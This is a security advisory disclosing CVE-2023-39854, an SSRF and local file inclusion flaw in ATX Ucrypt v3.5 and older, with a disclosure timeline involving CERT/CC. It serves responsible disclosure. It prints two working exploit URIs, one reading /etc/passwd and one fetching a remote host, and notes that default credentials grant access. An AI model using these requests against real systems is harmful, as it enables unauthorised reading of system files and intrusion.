CVE-2023-39854
CVE-2023-39854
Summary
The web interface of ATX Ucrypt (v3.5 and older) is vulnerable to a Server Side Request Forgery (SSRF) and Local File Inclusion (LFI) vulnerability, allowing authenticated users (or attackers using default credentials for the admin, master or user account) to access remote hosts and system files.
Version Impacted
ATX Ucrypt v3.5 and older
Vulnerability Details
An authenticated user, or an attacker using the default credentials for the admin, master or user account, can access remote web endpoints or local system files using the following URIs :
/hydra/view/get_cc_url?board_id=2&url=file%3A%2F%2F%2Fetc%2Fpasswd
/hydra/view/get_cc_url?board_id=1&url=https%3A%2F%2Fgoogle.com%3A443%2F
An example of a vulnerable host :
Recommended Mitigations
Multiple attempts had been made to responsibly disclose the issue to the vendor to address the root cause of this vulnerability, but no response was received.
Users are advised to audit all users of their deployment and ensure that they have rotated the default credentials for the admin, master and user accounts that this service has baked in.
Disclosure Timeline
| Jul 18, 2023 | First attempt made to contact ATX Networks on their marketing and security email. |
| Aug 15, 2023 | Second attempt made to contact ATX Networks on their marketing and security email. |
| Aug 19, 2023 | Case opened with CERT Coordination Center (CERT/CC) to assist with responsible disclosure. |
| Aug 21, 2023 | CERT/CC’s time window to responsible disclosure begins (Case VU#293164). |
| Oct 05, 2023 | Two attempts made by CERT/CC in the window receive no response and 45 day window ends. |
| Oct 05, 2023 | CVE number assigned by MITRE. |
| Oct 07, 2023 | Responsible public disclosure. |